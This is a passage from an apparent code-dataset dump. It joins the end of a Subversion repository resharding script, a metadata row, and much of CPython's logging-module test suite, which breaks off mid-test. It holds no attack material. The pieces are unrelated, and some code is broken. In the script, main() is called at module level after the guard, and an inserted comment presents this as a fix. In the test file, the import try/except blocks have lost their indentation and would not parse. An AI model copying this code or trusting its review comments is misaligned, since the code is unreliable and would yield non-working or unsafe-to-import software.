            linearise(os.path.join(repos_path, 'db', 'revprops'))
    if reshard and max_files_per_shard > 0:
        print('- sharding db/revs')
        shard(os.path.join(repos_path, 'db', 'revs'), max_files_per_shard,
              start, end)
        print('- sharding db/revprops')
        shard(os.path.join(repos_path, 'db', 'revprops'), max_files_per_shard,
              start, end)
    fs_format[1] = max_files_per_shard
    if max_files_per_shard == 0:
        print('- marking the repository as a valid linear repository')
    else:
        # Sharded. Keep original 3/4 format or upgrade format 2 to 3.
        # NOTE(review): check_fs_format() stores the format number as a
        # *string*, so 'fs_format[0] == 2' is never true and the intended
        # 2 -> 3 upgrade never happens; compare against int(fs_format[0]).
        if fs_format[0] == 2:
            fs_format[0] = 3
        print('- marking the repository as a valid sharded repository')
    # We're done. Stamp the filesystem with a format 2/3/4/6/7 db/format file.
    write_fs_format(repos_path, fs_format)
    print('- done.')
    sys.exit(0)
# The "unfinished" guard must run *before* main(): main() always terminates
# the process via sys.exit(), so with the original ordering (main() first,
# guard second) the safety check below could never fire.
if __name__ == '__main__':
    raise Exception("""This script is unfinished and not ready to be used on live data.
Trust us. Prepare a backup and run svnadmin verify before putting your repo online""")
main()
| false | true |
f7232f67eee7300d2e40c43492af00da60a37663 | 164,419 | py | Python | Lib/test/test_logging.py | jribbens/cpython | 2c5c0a367c6ca648178072240fe0a32848636da6 | [
"PSF-2.0"
] | 1 | 2019-09-04T02:06:21.000Z | 2019-09-04T02:06:21.000Z | Lib/test/test_logging.py | jribbens/cpython | 2c5c0a367c6ca648178072240fe0a32848636da6 | [
"PSF-2.0"
] | 1 | 2020-05-26T12:29:28.000Z | 2020-05-26T12:29:43.000Z | Lib/test/test_logging.py | jribbens/cpython | 2c5c0a367c6ca648178072240fe0a32848636da6 | [
"PSF-2.0"
] | 2 | 2018-05-03T01:08:13.000Z | 2019-12-02T03:03:43.000Z | # Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):

    """Base class for logging tests."""

    log_format = "%(name)s -> %(levelname)s: %(message)s"
    expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
    message_num = 0

    def setUp(self):
        """Setup the default logging stream to an internal StringIO instance,
        so that we can examine log output as we want."""
        self._threading_key = support.threading_setup()

        logger_dict = logging.getLogger().manager.loggerDict
        # Snapshot the module-global logging state under the module lock so
        # that tearDown() can restore it exactly, even if a test mutates it.
        logging._acquireLock()
        try:
            self.saved_handlers = logging._handlers.copy()
            self.saved_handler_list = logging._handlerList[:]
            self.saved_loggers = saved_loggers = logger_dict.copy()
            self.saved_name_to_level = logging._nameToLevel.copy()
            self.saved_level_to_name = logging._levelToName.copy()
            self.logger_states = logger_states = {}
            # Remember each logger's 'disabled' flag (None if unset).
            for name in saved_loggers:
                logger_states[name] = getattr(saved_loggers[name],
                                              'disabled', None)
        finally:
            logging._releaseLock()

        # Set two unused loggers
        self.logger1 = logging.getLogger("\xab\xd7\xbb")
        self.logger2 = logging.getLogger("\u013f\u00d6\u0047")

        self.root_logger = logging.getLogger("")
        self.original_logging_level = self.root_logger.getEffectiveLevel()

        self.stream = io.StringIO()
        self.root_logger.setLevel(logging.DEBUG)
        self.root_hdlr = logging.StreamHandler(self.stream)
        self.root_formatter = logging.Formatter(self.log_format)
        self.root_hdlr.setFormatter(self.root_formatter)
        # A handler already attached here means an earlier test leaked state.
        if self.logger1.hasHandlers():
            hlist = self.logger1.handlers + self.root_logger.handlers
            raise AssertionError('Unexpected handlers: %s' % hlist)
        if self.logger2.hasHandlers():
            hlist = self.logger2.handlers + self.root_logger.handlers
            raise AssertionError('Unexpected handlers: %s' % hlist)
        self.root_logger.addHandler(self.root_hdlr)
        self.assertTrue(self.logger1.hasHandlers())
        self.assertTrue(self.logger2.hasHandlers())

    def tearDown(self):
        """Remove our logging stream, and restore the original logging
        level."""
        self.stream.close()
        self.root_logger.removeHandler(self.root_hdlr)
        while self.root_logger.handlers:
            h = self.root_logger.handlers[0]
            self.root_logger.removeHandler(h)
            h.close()
        self.root_logger.setLevel(self.original_logging_level)
        # Restore the global logging state captured in setUp(), again under
        # the module lock.
        logging._acquireLock()
        try:
            logging._levelToName.clear()
            logging._levelToName.update(self.saved_level_to_name)
            logging._nameToLevel.clear()
            logging._nameToLevel.update(self.saved_name_to_level)
            logging._handlers.clear()
            logging._handlers.update(self.saved_handlers)
            logging._handlerList[:] = self.saved_handler_list
            manager = logging.getLogger().manager
            manager.disable = 0
            loggerDict = manager.loggerDict
            loggerDict.clear()
            loggerDict.update(self.saved_loggers)
            logger_states = self.logger_states
            for name in self.logger_states:
                if logger_states[name] is not None:
                    self.saved_loggers[name].disabled = logger_states[name]
        finally:
            logging._releaseLock()

        self.doCleanups()
        support.threading_cleanup(*self._threading_key)

    def assert_log_lines(self, expected_values, stream=None, pat=None):
        """Match the collected log lines against the regular expression
        self.expected_log_pat, and compare the extracted group values to
        the expected_values list of tuples."""
        stream = stream or self.stream
        pat = re.compile(pat or self.expected_log_pat)
        actual_lines = stream.getvalue().splitlines()
        self.assertEqual(len(actual_lines), len(expected_values))
        for actual, expected in zip(actual_lines, expected_values):
            match = pat.search(actual)
            if not match:
                self.fail("Log line does not match expected pattern:\n" +
                          actual)
            self.assertEqual(tuple(match.groups()), expected)
        # Anything still readable from the stream is unexpected output.
        s = stream.read()
        if s:
            self.fail("Remaining output at end of log stream:\n" + s)

    def next_message(self):
        """Generate a message consisting solely of an auto-incrementing
        integer."""
        self.message_num += 1
        return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):

    """Test builtin levels and their inheritance."""

    def test_flat(self):
        # Logging levels in a flat logger namespace.
        m = self.next_message

        ERR = logging.getLogger("ERR")
        ERR.setLevel(logging.ERROR)
        INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
        INF.setLevel(logging.INFO)
        DEB = logging.getLogger("DEB")
        DEB.setLevel(logging.DEBUG)

        # These should log.
        ERR.log(logging.CRITICAL, m())
        ERR.error(m())

        INF.log(logging.CRITICAL, m())
        INF.error(m())
        INF.warning(m())
        INF.info(m())

        DEB.log(logging.CRITICAL, m())
        DEB.error(m())
        DEB.warning(m())
        DEB.info(m())
        DEB.debug(m())

        # These should not log.
        ERR.warning(m())
        ERR.info(m())
        ERR.debug(m())

        INF.debug(m())

        self.assert_log_lines([
            ('ERR', 'CRITICAL', '1'),
            ('ERR', 'ERROR', '2'),
            ('INF', 'CRITICAL', '3'),
            ('INF', 'ERROR', '4'),
            ('INF', 'WARNING', '5'),
            ('INF', 'INFO', '6'),
            ('DEB', 'CRITICAL', '7'),
            ('DEB', 'ERROR', '8'),
            ('DEB', 'WARNING', '9'),
            ('DEB', 'INFO', '10'),
            ('DEB', 'DEBUG', '11'),
        ])

    def test_nested_explicit(self):
        # Logging levels in a nested namespace, all explicitly set.
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)

        # These should log.
        INF_ERR.log(logging.CRITICAL, m())
        INF_ERR.error(m())

        # These should not log.
        INF_ERR.warning(m())
        INF_ERR.info(m())
        INF_ERR.debug(m())

        self.assert_log_lines([
            ('INF.ERR', 'CRITICAL', '1'),
            ('INF.ERR', 'ERROR', '2'),
        ])

    def test_nested_inherited(self):
        # Logging levels in a nested namespace, inherited from parent loggers.
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)
        INF_UNDEF = logging.getLogger("INF.UNDEF")
        INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
        UNDEF = logging.getLogger("UNDEF")

        # These should log.
        INF_UNDEF.log(logging.CRITICAL, m())
        INF_UNDEF.error(m())
        INF_UNDEF.warning(m())
        INF_UNDEF.info(m())
        INF_ERR_UNDEF.log(logging.CRITICAL, m())
        INF_ERR_UNDEF.error(m())

        # These should not log.
        INF_UNDEF.debug(m())
        INF_ERR_UNDEF.warning(m())
        INF_ERR_UNDEF.info(m())
        INF_ERR_UNDEF.debug(m())

        self.assert_log_lines([
            ('INF.UNDEF', 'CRITICAL', '1'),
            ('INF.UNDEF', 'ERROR', '2'),
            ('INF.UNDEF', 'WARNING', '3'),
            ('INF.UNDEF', 'INFO', '4'),
            ('INF.ERR.UNDEF', 'CRITICAL', '5'),
            ('INF.ERR.UNDEF', 'ERROR', '6'),
        ])

    def test_nested_with_virtual_parent(self):
        # Logging levels when some parent does not exist yet.
        m = self.next_message

        INF = logging.getLogger("INF")
        GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
        CHILD = logging.getLogger("INF.BADPARENT")
        INF.setLevel(logging.INFO)

        # These should log.
        GRANDCHILD.log(logging.FATAL, m())
        GRANDCHILD.info(m())
        CHILD.log(logging.FATAL, m())
        CHILD.info(m())

        # These should not log.
        GRANDCHILD.debug(m())
        CHILD.debug(m())

        self.assert_log_lines([
            ('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
            ('INF.BADPARENT.UNDEF', 'INFO', '2'),
            ('INF.BADPARENT', 'CRITICAL', '3'),
            ('INF.BADPARENT', 'INFO', '4'),
        ])

    def test_regression_22386(self):
        """See issue #22386 for more information."""
        self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
        self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')

    def test_issue27935(self):
        # 'FATAL' must resolve to the same numeric level as logging.FATAL.
        fatal = logging.getLevelName('FATAL')
        self.assertEqual(fatal, logging.FATAL)

    def test_regression_29220(self):
        """See issue #29220 for more information."""
        # NOTE: this method was previously defined twice in this class; the
        # first (smaller) definition was dead code silently shadowed by this
        # one, so the duplicate has been removed.
        logging.addLevelName(logging.INFO, '')
        self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
        self.assertEqual(logging.getLevelName(logging.INFO), '')
        self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
        self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):

    """Test the bundled Filter class."""

    def test_filter(self):
        # A Filter("spam.eggs") passes only records from the "spam.eggs"
        # logger and its descendants.
        name_filter = logging.Filter("spam.eggs")
        handler = self.root_logger.handlers[0]
        try:
            handler.addFilter(name_filter)
            for logger_name in ("spam", "spam.eggs", "spam.eggs.fish",
                                "spam.bakedbeans"):
                logging.getLogger(logger_name).info(self.next_message())
            # Only the "spam.eggs" subtree (messages 2 and 3) got through.
            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        finally:
            handler.removeFilter(name_filter)

    def test_callable_filter(self):
        # A plain callable may also act as a filter; it receives each record
        # and keeps only those whose name starts with "spam.eggs".
        def accept(record):
            return '.'.join(record.name.split('.')[:2]) == 'spam.eggs'

        handler = self.root_logger.handlers[0]
        try:
            handler.addFilter(accept)
            for logger_name in ("spam", "spam.eggs", "spam.eggs.fish",
                                "spam.bakedbeans"):
                logging.getLogger(logger_name).info(self.next_message())
            # Only the "spam.eggs" subtree (messages 2 and 3) got through.
            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        finally:
            handler.removeFilter(accept)

    def test_empty_filter(self):
        # A Filter constructed without a name matches every record.
        record = logging.makeLogRecord({'name': 'spam.eggs'})
        self.assertTrue(logging.Filter().filter(record))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111

# All custom levels, from lowest (BORING) to highest (SILENT), inclusive.
LEVEL_RANGE = range(BORING, SILENT + 1)

#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
    SILENT : 'Silent',
    TACITURN : 'Taciturn',
    TERSE : 'Terse',
    EFFUSIVE : 'Effusive',
    SOCIABLE : 'Sociable',
    VERBOSE : 'Verbose',
    TALKATIVE : 'Talkative',
    GARRULOUS : 'Garrulous',
    CHATTERBOX : 'Chatterbox',
    BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):

    """A filter which blocks garrulous messages."""

    def filter(self, record):
        # Keep every record except those logged at the GARRULOUS level.
        keep = record.levelno != GARRULOUS
        return keep
class VerySpecificFilter(logging.Filter):

    """A filter which blocks sociable and taciturn messages."""

    def filter(self, record):
        # Drop exactly the SOCIABLE and TACITURN levels; keep the rest.
        blocked = (SOCIABLE, TACITURN)
        return record.levelno not in blocked
class CustomLevelsAndFiltersTest(BaseTest):

    """Test various filtering possibilities with custom logging levels."""

    # Skip the logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"

    def setUp(self):
        BaseTest.setUp(self)
        # Register human-readable names for the custom levels; BaseTest's
        # tearDown restores the original level/name tables.
        for k, v in my_logging_levels.items():
            logging.addLevelName(k, v)

    def log_at_all_levels(self, logger):
        # Emit one auto-numbered message at every custom level, lowest first.
        for lvl in LEVEL_RANGE:
            logger.log(lvl, self.next_message())

    def test_logger_filter(self):
        # Filter at logger level.
        self.root_logger.setLevel(VERBOSE)
        # Levels >= 'Verbose' are good.
        self.log_at_all_levels(self.root_logger)
        self.assert_log_lines([
            ('Verbose', '5'),
            ('Sociable', '6'),
            ('Effusive', '7'),
            ('Terse', '8'),
            ('Taciturn', '9'),
            ('Silent', '10'),
        ])

    def test_handler_filter(self):
        # Filter at handler level.
        self.root_logger.handlers[0].setLevel(SOCIABLE)
        try:
            # Levels >= 'Sociable' are good.
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines([
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ])
        finally:
            self.root_logger.handlers[0].setLevel(logging.NOTSET)

    def test_specific_filters(self):
        # Set a specific filter object on the handler, and then add another
        # filter object on the logger itself.
        handler = self.root_logger.handlers[0]
        specific_filter = None
        garr = GarrulousFilter()
        handler.addFilter(garr)
        try:
            self.log_at_all_levels(self.root_logger)
            first_lines = [
                # Notice how 'Garrulous' is missing
                ('Boring', '1'),
                ('Chatterbox', '2'),
                ('Talkative', '4'),
                ('Verbose', '5'),
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ]
            self.assert_log_lines(first_lines)

            specific_filter = VerySpecificFilter()
            self.root_logger.addFilter(specific_filter)
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines(first_lines + [
                # Not only 'Garrulous' is still missing, but also 'Sociable'
                # and 'Taciturn'
                ('Boring', '11'),
                ('Chatterbox', '12'),
                ('Talkative', '14'),
                ('Verbose', '15'),
                ('Effusive', '17'),
                ('Terse', '18'),
                ('Silent', '20'),
            ])
        finally:
            if specific_filter:
                self.root_logger.removeFilter(specific_filter)
            handler.removeFilter(garr)
class HandlerTest(BaseTest):
    def test_name(self):
        # A handler's name is a plain read/write property.
        h = logging.Handler()
        h.name = 'generic'
        self.assertEqual(h.name, 'generic')
        h.name = 'anothergeneric'
        self.assertEqual(h.name, 'anothergeneric')
        # The base class does not implement emit().
        self.assertRaises(NotImplementedError, h.emit, None)

    def test_builtin_handlers(self):
        # We can't actually *use* too many handlers in the tests,
        # but we can try instantiating them with various options
        if sys.platform in ('linux', 'darwin'):
            for existing in (True, False):
                fd, fn = tempfile.mkstemp()
                os.close(fd)
                if not existing:
                    os.unlink(fn)
                h = logging.handlers.WatchedFileHandler(fn, delay=True)
                if existing:
                    # With delay=True the file is not opened yet, so the
                    # (device, inode) pair is still the sentinel (-1, -1).
                    dev, ino = h.dev, h.ino
                    self.assertEqual(dev, -1)
                    self.assertEqual(ino, -1)
                    r = logging.makeLogRecord({'msg': 'Test'})
                    h.handle(r)
                    # Now remove the file.
                    os.unlink(fn)
                    self.assertFalse(os.path.exists(fn))
                    # The next call should recreate the file.
                    h.handle(r)
                    self.assertTrue(os.path.exists(fn))
                else:
                    self.assertEqual(h.dev, -1)
                    self.assertEqual(h.ino, -1)
                h.close()
                if existing:
                    os.unlink(fn)
            if sys.platform == 'darwin':
                sockname = '/var/run/syslog'
            else:
                sockname = '/dev/log'
            try:
                h = logging.handlers.SysLogHandler(sockname)
                self.assertEqual(h.facility, h.LOG_USER)
                self.assertTrue(h.unixsocket)
                h.close()
            except OSError:  # syslogd might not be available
                pass
        for method in ('GET', 'POST', 'PUT'):
            if method == 'PUT':
                # Only GET and POST are supported by HTTPHandler.
                self.assertRaises(ValueError, logging.handlers.HTTPHandler,
                                  'localhost', '/log', method)
            else:
                h = logging.handlers.HTTPHandler('localhost', '/log', method)
                h.close()
        # A zero-capacity BufferingHandler always wants to flush.
        h = logging.handlers.BufferingHandler(0)
        r = logging.makeLogRecord({})
        self.assertTrue(h.shouldFlush(r))
        h.close()
        h = logging.handlers.BufferingHandler(1)
        self.assertFalse(h.shouldFlush(r))
        h.close()

    def test_path_objects(self):
        """
        Test that Path objects are accepted as filename arguments to handlers.

        See Issue #27493.
        """
        fd, fn = tempfile.mkstemp()
        os.close(fd)
        os.unlink(fn)
        pfn = pathlib.Path(fn)
        cases = (
            (logging.FileHandler, (pfn, 'w')),
            (logging.handlers.RotatingFileHandler, (pfn, 'a')),
            (logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
        )
        if sys.platform in ('linux', 'darwin'):
            cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
        for cls, args in cases:
            h = cls(*args)
            self.assertTrue(os.path.exists(fn))
            h.close()
            os.unlink(fn)

    @unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
    def test_race(self):
        # Issue #14632 refers.
        # A background thread repeatedly deletes the log file while the
        # handler keeps logging to it; handle() must never raise.
        def remove_loop(fname, tries):
            for _ in range(tries):
                try:
                    os.unlink(fname)
                    self.deletion_time = time.time()
                except OSError:
                    pass
                time.sleep(0.004 * random.randint(0, 4))

        del_count = 500
        log_count = 500

        self.handle_time = None
        self.deletion_time = None

        for delay in (False, True):
            fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
            os.close(fd)
            remover = threading.Thread(target=remove_loop, args=(fn, del_count))
            remover.daemon = True
            remover.start()
            h = logging.handlers.WatchedFileHandler(fn, delay=delay)
            f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
            h.setFormatter(f)
            try:
                for _ in range(log_count):
                    time.sleep(0.005)
                    r = logging.makeLogRecord({'msg': 'testing' })
                    try:
                        self.handle_time = time.time()
                        h.handle(r)
                    except Exception:
                        # Report the timing context before failing.
                        print('Deleted at %s, '
                              'opened at %s' % (self.deletion_time,
                                                self.handle_time))
                        raise
            finally:
                remover.join()
                h.close()
                if os.path.exists(fn):
                    os.unlink(fn)
class BadStream(object):
    """Stream stand-in whose write() always fails, for error-path tests."""

    def write(self, data):
        # Simulate a broken underlying stream.
        raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
    # StreamHandler whose error hook records the failing record (instead of
    # printing a traceback) so tests can assert on it.
    def handleError(self, record):
        self.error_record = record
class StreamHandlerTest(BaseTest):
    def test_error_handling(self):
        # With the custom handleError() above, the failing record is captured.
        h = TestStreamHandler(BadStream())
        r = logging.makeLogRecord({})
        old_raise = logging.raiseExceptions

        try:
            h.handle(r)
            self.assertIs(h.error_record, r)

            # Default handleError() prints a traceback to stderr...
            h = logging.StreamHandler(BadStream())
            with support.captured_stderr() as stderr:
                h.handle(r)
                msg = '\nRuntimeError: deliberate mistake\n'
                self.assertIn(msg, stderr.getvalue())

            # ...unless raiseExceptions is turned off.
            logging.raiseExceptions = False
            with support.captured_stderr() as stderr:
                h.handle(r)
                self.assertEqual('', stderr.getvalue())
        finally:
            logging.raiseExceptions = old_raise

    def test_stream_setting(self):
        """
        Test setting the handler's stream
        """
        h = logging.StreamHandler()
        stream = io.StringIO()
        # setStream() returns the previously-set stream.
        old = h.setStream(stream)
        self.assertIs(old, sys.stderr)
        actual = h.setStream(old)
        self.assertIs(actual, stream)
        # test that setting to existing value returns None
        actual = h.setStream(old)
        self.assertIsNone(actual)
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
    """
    This class implements a test SMTP server.

    :param addr: A (host, port) tuple which the server listens on.
                 You can specify a port value of zero: the server's
                 *port* attribute will hold the actual port number
                 used, which can be used in client connections.
    :param handler: A callable which will be called to process
                    incoming messages. The handler will be passed
                    the client address tuple, who the message is from,
                    a list of recipients and the message data.
    :param poll_interval: The interval, in seconds, used in the underlying
                          :func:`select` or :func:`poll` call by
                          :func:`asyncore.loop`.
    :param sockmap: A dictionary which will be used to hold
                    :class:`asyncore.dispatcher` instances used by
                    :func:`asyncore.loop`. This avoids changing the
                    :mod:`asyncore` module's global state.
    """

    def __init__(self, addr, handler, poll_interval, sockmap):
        smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
                                  decode_data=True)
        # Record the actual bound port (useful when addr used port 0).
        self.port = self.socket.getsockname()[1]
        self._handler = handler
        self._thread = None
        self.poll_interval = poll_interval

    def process_message(self, peer, mailfrom, rcpttos, data):
        """
        Delegates to the handler passed in to the server's constructor.

        Typically, this will be a test case method.
        :param peer: The client (host, port) tuple.
        :param mailfrom: The address of the sender.
        :param rcpttos: The addresses of the recipients.
        :param data: The message.
        """
        self._handler(peer, mailfrom, rcpttos, data)

    def start(self):
        """
        Start the server running on a separate daemon thread.
        """
        self._thread = t = threading.Thread(target=self.serve_forever,
                                            args=(self.poll_interval,))
        # Use the daemon attribute rather than the deprecated setDaemon(),
        # consistent with the rest of this file (see test_race).
        t.daemon = True
        t.start()

    def serve_forever(self, poll_interval):
        """
        Run the :mod:`asyncore` loop until normal termination
        conditions arise.
        :param poll_interval: The interval, in seconds, used in the underlying
                              :func:`select` or :func:`poll` call by
                              :func:`asyncore.loop`.
        """
        asyncore.loop(poll_interval, map=self._map)

    def stop(self, timeout=None):
        """
        Stop the thread by closing the server instance.
        Wait for the server thread to terminate.

        :param timeout: How long to wait for the server thread
                        to terminate.
        """
        self.close()
        support.join_thread(self._thread, timeout)
        self._thread = None
        asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
    """
    This mixin is used to start a server on a separate thread, and
    shut it down programmatically. Request handling is simplified - instead
    of needing to derive a suitable RequestHandler subclass, you just
    provide a callable which will be passed each received request to be
    processed.

    :param handler: A handler callable which will be called with a
                    single parameter - the request - in order to
                    process the request. This handler is called on the
                    server thread, effectively meaning that requests are
                    processed serially. While not quite Web scale ;-),
                    this should be fine for testing applications.
    :param poll_interval: The polling interval in seconds.
    """
    def __init__(self, handler, poll_interval):
        self._thread = None
        self.poll_interval = poll_interval
        self._handler = handler
        # Set once the server thread has entered its service loop.
        self.ready = threading.Event()

    def start(self):
        """
        Create a daemon thread to run the server, and start it.
        """
        self._thread = t = threading.Thread(target=self.serve_forever,
                                            args=(self.poll_interval,))
        # Use the daemon attribute rather than the deprecated setDaemon(),
        # consistent with the rest of this file (see test_race).
        t.daemon = True
        t.start()

    def serve_forever(self, poll_interval):
        """
        Run the server. Set the ready flag before entering the
        service loop.
        """
        self.ready.set()
        super(ControlMixin, self).serve_forever(poll_interval)

    def stop(self, timeout=None):
        """
        Tell the server thread to stop, and wait for it to do so.

        :param timeout: How long to wait for the server thread
                        to terminate.
        """
        self.shutdown()
        if self._thread is not None:
            support.join_thread(self._thread, timeout)
            self._thread = None
        self.server_close()
        self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
    """
    An HTTP server which is controllable using :class:`ControlMixin`.

    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a
                    single parameter - the request - in order to
                    process the request.
    :param poll_interval: The polling interval in seconds.
    :param log: Pass ``True`` to enable log messages.
    """
    def __init__(self, addr, handler, poll_interval=0.5,
                 log=False, sslctx=None):
        class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
            def __getattr__(self, name, default=None):
                # Route every do_GET/do_POST/... lookup to the one delegate.
                if name.startswith('do_'):
                    return self.process_request
                raise AttributeError(name)

            def process_request(self):
                self.server._handler(self)

            def log_message(self, format, *args):
                # Silent unless the server was created with log=True.
                if log:
                    super(DelegatingHTTPRequestHandler,
                          self).log_message(format, *args)
        HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
        ControlMixin.__init__(self, handler, poll_interval)
        self.sslctx = sslctx

    def get_request(self):
        try:
            sock, addr = self.socket.accept()
            if self.sslctx:
                sock = self.sslctx.wrap_socket(sock, server_side=True)
        except OSError as e:
            # socket errors are silenced by the caller, print them here
            sys.stderr.write("Got an error:\n%s\n" % e)
            raise
        return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
    """
    A TCP server which is controllable using :class:`ControlMixin`.

    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a single
                    parameter - the request - in order to process the request.
    :param poll_interval: The polling interval in seconds.
    :bind_and_activate: If True (the default), binds the server and starts it
                        listening. If False, you need to call
                        :meth:`server_bind` and :meth:`server_activate` at
                        some later time before calling :meth:`start`, so that
                        the server will set up the socket and listen on it.
    """

    allow_reuse_address = True

    def __init__(self, addr, handler, poll_interval=0.5,
                 bind_and_activate=True):
        class DelegatingTCPRequestHandler(StreamRequestHandler):

            def handle(self):
                # Forward each connection to the server's handler callable.
                self.server._handler(self)
        ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
                                    bind_and_activate)
        ControlMixin.__init__(self, handler, poll_interval)

    def server_bind(self):
        super(TestTCPServer, self).server_bind()
        # Record the actual bound port (useful when binding with port 0).
        self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
    """
    A UDP server which is controllable using :class:`ControlMixin`.

    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a
                    single parameter - the request - in order to
                    process the request.
    :param poll_interval: The polling interval for shutdown requests,
                          in seconds.
    :bind_and_activate: If True (the default), binds the server and
                        starts it listening. If False, you need to
                        call :meth:`server_bind` and
                        :meth:`server_activate` at some later time
                        before calling :meth:`start`, so that the server will
                        set up the socket and listen on it.
    """
    def __init__(self, addr, handler, poll_interval=0.5,
                 bind_and_activate=True):
        class DelegatingUDPRequestHandler(DatagramRequestHandler):

            def handle(self):
                self.server._handler(self)

            def finish(self):
                data = self.wfile.getvalue()
                if data:
                    try:
                        super(DelegatingUDPRequestHandler, self).finish()
                    except OSError:
                        # Ignore send errors only if the server has already
                        # been closed; otherwise they are real failures.
                        if not self.server._closed:
                            raise
        ThreadingUDPServer.__init__(self, addr,
                                    DelegatingUDPRequestHandler,
                                    bind_and_activate)
        ControlMixin.__init__(self, handler, poll_interval)
        self._closed = False

    def server_bind(self):
        super(TestUDPServer, self).server_bind()
        # Record the actual bound port (useful when binding with port 0).
        self.port = self.socket.getsockname()[1]

    def server_close(self):
        super(TestUDPServer, self).server_close()
        self._closed = True
if hasattr(socket, "AF_UNIX"):
    # Unix-domain variants of the stream/datagram test servers above; only
    # defined on platforms that support AF_UNIX sockets.
    class TestUnixStreamServer(TestTCPServer):
        address_family = socket.AF_UNIX

    class TestUnixDatagramServer(TestUDPServer):
        address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
    # bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
    TIMEOUT = 60.0

    def test_basic(self):
        # Spin up an in-process SMTP server and check that SMTPHandler
        # delivers a correctly-formed message to it.
        sockmap = {}
        server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
                                sockmap)
        server.start()
        addr = (support.HOST, server.port)
        h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
                                         timeout=self.TIMEOUT)
